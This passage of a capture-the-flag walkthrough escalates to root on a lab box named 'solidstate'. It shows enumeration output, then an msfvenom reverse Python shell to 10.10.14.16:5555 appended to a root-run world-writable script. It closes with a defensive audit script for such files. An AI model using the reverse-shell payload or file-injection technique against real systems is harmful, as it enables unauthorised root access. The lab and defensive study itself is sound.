-rwxr-sr-x 1 root ssh 431632 Jun 17 2017 /usr/bin/ssh-agent
-rwxr-sr-x 1 root utmp 5480 Feb 18 2016 /usr/lib/i386-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root mail 13680 Mar 23 2017 /usr/lib/evolution/camel-lock-helper-1.2
-rwsr-sr-x 1 root root 9772 Jul 7 2017 /usr/lib/xorg/Xorg.wrap
.
.
World-writable files (excluding /proc):
-rwxrwxrwx 1 root root 105 Aug 22 13:32 /opt/tmp.py
--w--w--w- 1 root root 0 Jan 17 12:49 /sys/fs/cgroup/memory/cgroup.event_control
.
.
rhost config file(s) and file contents:
-rw------- 1 root root 0 Aug 22 13:41 /home/mindy/.rhosts
.
.
Find keyword (password) in .conf files (recursive 4 levels - output format filepath:identified line number where keyword appears):
/etc/cracklib/cracklib.conf:17:# passwords should not match. The files may optionally be compressed
/etc/reportbug.conf:71:# Username and password for SMTP
/etc/apache2/sites-available/default-ssl.conf:78: # Note that no password is obtained from the user. Every entry in the user
/etc/apache2/sites-available/default-ssl.conf:79: # file needs this password: `xxj31ZMTZzkVA'.
/etc/security/pwquality.conf:1:# Configuration for systemwide password quality limits
/etc/security/pwquality.conf:4:# Number of characters in the new password that must not be present in the
/etc/security/pwquality.conf:5:# old password.
/etc/security/pwquality.conf:8:# Minimum acceptable size for the new password (plus one if
/etc/security/pwquality.conf:13:# The maximum credit for having digits in the new password. If less than 0
/etc/security/pwquality.conf:14:# it is the minimum number of digits in the new password.
/etc/security/pwquality.conf:17:# The maximum credit for having uppercase characters in the new password.
/etc/security/pwquality.conf:19:# password.
/etc/security/pwquality.conf:22:# The maximum credit for having lowercase characters in the new password.
/etc/security/pwquality.conf:24:# password.
/etc/security/pwquality.conf:27:# The maximum credit for having other characters in the new password.
/etc/security/pwquality.conf:29:# password.
/etc/security/pwquality.conf:33:# password (digits, uppercase, lowercase, others).
/etc/security/pwquality.conf:36:# The maximum number of allowed consecutive same characters in the new password.
/etc/security/pwquality.conf:41:# new password.
/etc/hdparm.conf:86:# --security-set-pass Set security password
/etc/hdparm.conf:87:# security_pass = password
/etc/hdparm.conf:90:# --user-master Select password to use
/etc/debconf.conf:14:# World-readable, and accepts everything but passwords.
/etc/debconf.conf:18:Reject-Type: password
/etc/debconf.conf:21:# Not world readable (the default), and accepts only passwords.
/etc/debconf.conf:22:Name: passwords
/etc/debconf.conf:27:Accept-Type: password
/etc/debconf.conf:28:Filename: /var/cache/debconf/passwords.dat
/etc/debconf.conf:31:# databases, one to hold passwords and one for everything else.
/etc/debconf.conf:34:Stack: config, passwords
/etc/debconf.conf:58:# A remote LDAP database. It is also read-only. The password is really
/etc/apg.conf:6:#Pronounceable passwords with special characters:
/etc/apg.conf:9:#Pronounceable passwords without special characters:
/etc/apg.conf:12:#Random passwords:
/usr/lib/tmpfiles.d/passwd.conf:1:# If a password operation is in progress and we lose power, stale lockfiles
/usr/lib/tmpfiles.d/systemd.conf:13:d /run/systemd/ask-password 0755 root root -
/usr/lib/realmd/realmd-defaults.conf:43:example-password = bureaucracy
/usr/share/debconf/debconf.conf:8:Reject-Type: password
/usr/share/debconf/debconf.conf:11:Name: passwords
/usr/share/debconf/debconf.conf:16:Accept-Type: password
/usr/share/debconf/debconf.conf:17:Filename: /var/cache/debconf/passwords.dat
/usr/share/debconf/debconf.conf:21:Stack: config, passwords
.
.
Find keyword (password) in .log files (recursive 2 levels):
'password' not found in any .log files
.
.
Find keyword (password) in .ini files (recursive 2 levels):
'password' not found in any .ini files
.
.
All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 973 Jan 31 2017 /etc/mke2fs.conf
-rw-r--r-- 1 root root 1018 Jan 23 2017 /etc/usb_modeswitch.conf
-rw-r--r-- 1 root root 1260 Mar 16 2016 /etc/ucf.conf
-rw-r--r-- 1 root root 2683 Nov 22 2016 /etc/sysctl.conf
-rw-r--r-- 1 root root 191 Apr 12 2017 /etc/libaudit.conf
-rw-r--r-- 1 root root 1343 Jan 9 2007 /etc/wodim.conf
-rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf
-rw-r--r-- 1 root root 769 Jan 22 2017 /etc/appstream.conf
-rw-r--r-- 1 root root 3173 May 29 2017 /etc/reportbug.conf
-rw-r--r-- 1 root root 2584 Aug 1 2016 /etc/gai.conf
-rw-r--r-- 1 root root 552 May 27 2017 /etc/pam.conf
-rw-r--r-- 1 root root 4781 Jan 24 2017 /etc/hdparm.conf
-rw-r--r-- 1 root root 2969 May 21 2017 /etc/debconf.conf
-rw-r--r-- 1 root root 540 Jun 18 2017 /etc/nsswitch.conf
-rw-r--r-- 1 root root 433 Aug 5 2016 /etc/apg.conf
-rw-r--r-- 1 root root 10368 Apr 5 2017 /etc/sensors3.conf
-rw-r--r-- 1 root root 26 Oct 30 2016 /etc/libao.conf
-rw-r--r-- 1 root root 4988 Mar 11 2017 /etc/rygel.conf
-rw-r--r-- 1 root root 2064 Nov 23 2006 /etc/netscsid.conf
-rw-r--r-- 1 root root 7649 Jun 18 2017 /etc/pnm2ppa.conf
-rw-r--r-- 1 root root 1131 Nov 20 2016 /etc/dleyna-server-service.conf
-rw-r--r-- 1 root root 1963 Jan 18 2017 /etc/rsyslog.conf
-rw-r--r-- 1 root root 2981 Jun 18 2017 /etc/adduser.conf
-rw-r--r-- 1 root root 599 May 5 2015 /etc/logrotate.conf
-rw-r--r-- 1 root root 9 Aug 7 2006 /etc/host.conf
-rw-r--r-- 1 root root 346 Nov 30 2016 /etc/discover-modprobe.conf
-rw-r--r-- 1 root root 34 Apr 9 2017 /etc/ld.so.conf
-rw-r--r-- 1 root root 7431 Jun 18 2017 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 604 Jun 26 2016 /etc/deluser.conf
-rw-r--r-- 1 root root 144 Jun 18 2017 /etc/kernel-img.conf
.
.
Current user's history files:
-rw-r--r-- 1 root root 0 Aug 22 13:41 /home/mindy/.bash_history
.
.
Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Jun 18 2017 .
drwxr-xr-x 12 root root 4096 Aug 22 13:21 ..
.
.
### SCAN COMPLETE ####################################

Lots of stuff here to review, but if we look closely a few things jump out at us. First, the root user can log in over SSH. That has potential to be interesting for sure. The other thing that catches our attention is that there is a world-writable file owned by root. Maybe we can use this.


World-writable files (excluding /proc):
-rwxrwxrwx 1 root root 105 Aug 22 13:32 /opt/tmp.py

If we go and look at it, we see:


${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()

Wonder what happens if we append our own code to this. We are already using port 4444 for our first shell, so let's use 5555 for our next one. We'll build a payload in msfvenom like so:


root@kali:/var/www/html# msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.16 LPORT=5555 -a cmd -e generic/none --platform Unix
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 549 (iteration=0)
generic/none chosen with final size 549
Payload size: 549 bytes
python -c "exec('aW1wb3J0IHNvY2tldCAgICAgICAsICAgICAgc3VicHJvY2VzcyAgICAgICAsICAgICAgb3MgICAgICA7ICBob3N0PSIxMC4xMC4xNC4xNiIgICAgICA7ICBwb3J0PTU1NTUgICAgICA7ICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgICAgLCAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICA7ICBzLmNvbm5lY3QoKGhvc3QgICAgICAgLCAgICAgIHBvcnQpKSAgICAgIDsgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICAsICAgICAgMCkgICAgICA7ICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgLCAgICAgIDEpICAgICAgOyAgb3MuZHVwMihzLmZpbGVubygpICAgICAgICwgICAgICAyKSAgICAgIDsgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"

Now we can append this to the Python script:


echo "exec('aW1wb3J0IHNvY2tldCAgICAgICAsICAgICAgc3VicHJvY2VzcyAgICAgICAsICAgICAgb3MgICAgICA7ICBob3N0PSIxMC4xMC4xNC4xNiIgICAgICA7ICBwb3J0PTU1NTUgICAgICA7ICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgICAgLCAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICA7ICBzLmNvbm5lY3QoKGhvc3QgICAgICAgLCAgICAgIHBvcnQpKSAgICAgIDsgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICAsICAgICAgMCkgICAgICA7ICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgLCAgICAgIDEpICAgICAgOyAgb3MuZHVwMihzLmZpbGVubygpICAgICAgICwgICAgICAyKSAgICAgIDsgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))" >>/opt/tmp.py
cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()
exec('aW1wb3J0IHNvY2tldCAgICAgICAsICAgICAgc3VicHJvY2VzcyAgICAgICAsICAgICAgb3MgICAgICA7ICBob3N0PSIxMC4xMC4xNC4xNiIgICAgICA7ICBwb3J0PTU1NTUgICAgICA7ICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgICAgLCAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICA7ICBzLmNvbm5lY3QoKGhvc3QgICAgICAgLCAgICAgIHBvcnQpKSAgICAgIDsgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICAsICAgICAgMCkgICAgICA7ICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgLCAgICAgIDEpICAgICAgOyAgb3MuZHVwMihzLmZpbGVubygpICAgICAgICwgICAgICAyKSAgICAgIDsgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))

Then we waited... and eventually we got a shell!


root@kali:/var/www/html# nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.51] 36674
id
uid=0(root) gid=0(root) groups=0(root)
hostname
solidstate
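The root shell above came from a single misconfiguration: a root-owned script, /opt/tmp.py, that any user could modify and that was later executed as root (which is why the shell took a while to arrive). As an added defender-side example (not from the original post or from LinEnum), the Python 3 audit below reproduces LinEnum's world-writable check and adds the two conditions a reviewer actually wants: whether the parent directory lets anyone replace the file even when the file itself is not writable, and whether the file is root-owned and executable. The skip list, the Finding fields and the severity ranking are this example's own choices.

```python
# Added example (not from the original post or from LinEnum): audit a tree
# for the weakness behind /opt/tmp.py, a file anyone can change that later
# runs as root. Skip prefixes, Finding fields and severity are this example's.
import os
import stat
from dataclasses import dataclass

SKIP_PREFIXES = ("/proc", "/sys", "/dev", "/run")   # pseudo/volatile filesystems
SEVERITY_ORDER = {"high": 0, "medium": 1, "low": 2}


@dataclass
class Finding:
    path: str
    owner_uid: int
    world_writable: bool   # others have the w bit on the file itself
    replaceable: bool      # parent dir is world-writable and not sticky
    executable: bool       # any x bit set, so something probably runs it
    fix: str               # chmod that closes the hole

    @property
    def severity(self) -> str:
        # Root-owned and executable is exactly the /opt/tmp.py case.
        if self.owner_uid == 0 and self.executable:
            return "high"
        if self.owner_uid == 0:
            return "medium"
        return "low"


def dir_replaceable(dir_mode: int) -> bool:
    """World-writable directory without the sticky bit: any user can unlink
    and recreate entries, unlike /tmp, whose 1777 mode protects them."""
    return bool(dir_mode & stat.S_IWOTH) and not (dir_mode & stat.S_ISVTX)


def find_world_writable(root="/", skip=SKIP_PREFIXES):
    """Return a Finding for every regular file under root that others can
    write directly or replace through its parent directory."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(skip):
            dirnames[:] = []   # do not descend into skipped trees
            continue
        try:
            replaceable = dir_replaceable(os.lstat(dirpath).st_mode)
        except OSError:
            continue
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue   # symlinks, sockets and devices are out of scope here
            ww = bool(st.st_mode & stat.S_IWOTH)
            if not (ww or replaceable):
                continue
            x_bits = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
            findings.append(Finding(
                path=full,
                owner_uid=st.st_uid,
                world_writable=ww,
                replaceable=replaceable,
                executable=bool(st.st_mode & x_bits),
                # fix the file if it is writable, otherwise its parent directory
                fix=f"chmod o-w {full if ww else dirpath}",
            ))
    return findings


if __name__ == "__main__":
    import sys
    start = sys.argv[1] if len(sys.argv) > 1 else "/"
    for f in sorted(find_world_writable(start), key=lambda f: SEVERITY_ORDER[f.severity]):
        print(f"[{f.severity}] {f.path} uid={f.owner_uid} -> {f.fix}")
```

Run it as root against / to cover files other users cannot stat; on this box it would have reported /opt/tmp.py as high and suggested chmod o-w /opt/tmp.py.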


Author Kevin Kirsche

Kevin is a Principal Security Architect with Verizon. He holds the OSCP, OSWP, OSCE, and SLAE certifications. He is interested in learning more about building exploits and advanced penetration testing concepts.
